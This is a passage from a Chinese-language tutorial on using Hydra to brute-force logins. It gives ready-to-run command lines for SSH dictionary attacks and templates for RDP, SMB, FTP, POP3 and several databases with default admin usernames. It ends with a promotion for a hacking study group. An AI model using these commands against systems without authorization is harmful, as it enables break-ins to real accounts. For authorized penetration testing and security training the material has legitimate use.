hydra -l root -p 12345678 ssh://192.168.31.173
执行的结果都是一样的。
这里主要简单介绍一下用法,我知道我的SSH密码,所以就直接指定密码了。
但很多时候,我们是不知道密码的,所以就要使用密码字典来爆破。
三、使用字典爆破
小写的 -p
是指定密码,大写的 -P
是指定字典文件。
hydra -l root -P 密码字典 192.168.31.173 ssh
1)我们先准备一个简单的密码字典,创建一个 pwd.txt
文件,在里面输入几个简单的密码:
2)然后指定这个密码字典:
hydra -l root -P pwd.txt 192.168.31.173 ssh
可以看到爆破成功了,但只给了一个结果:
3)如果想看爆破的过程,可以加上 -vV
参数,显示执行细节:
hydra -l root -P pwd.txt 192.168.31.173 ssh -vV
我们的密码字典中有三个密码,它也会执行三次,并把执行过程列了出来。
4)上面的密码字典使用的是相对路径,我们也可以把它换成绝对路径:
hydra -l root -P /root/pwd.txt 192.168.31.173 ssh
SSH协议的默认用户是 root,所以上面我们都是指定的用户名,如果不确定用户名,就要指定用户名字典,比如下面这种格式:
hydra -L /root/usr.txt -P /root/pwd.txt 192.168.31.173 ssh
爆破其他协议服务时,把协议名和默认用户名换一下就可以了。
协议对应的服务名和默认密码经常会忘记,下面整理了一些常见的服务爆破格式。
四、Hydra爆破常见服务
远程桌面(RDP)
hydra -l administrator -P 密码字典 192.168.31.173 rdp
共享文件(SMB)
hydra -l administrator -P 密码字典 192.168.31.173 smb
文件传输(FTP)
hydra -l 用户名 -P 密码字典 192.168.31.173 ftp
邮箱协议(POP3)
hydra -l 用户名 -P 密码字典 192.168.31.173 pop3
MSSQL数据库
hydra -l sa -P 密码字典 192.168.31.173 mssql
MySQL数据库
hydra -l 用户名 -P 密码字典 192.168.31.173 mysql
Oracle数据库
hydra -l 用户名 -P 密码字典 192.168.31.173 oracle
Redis数据库
学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!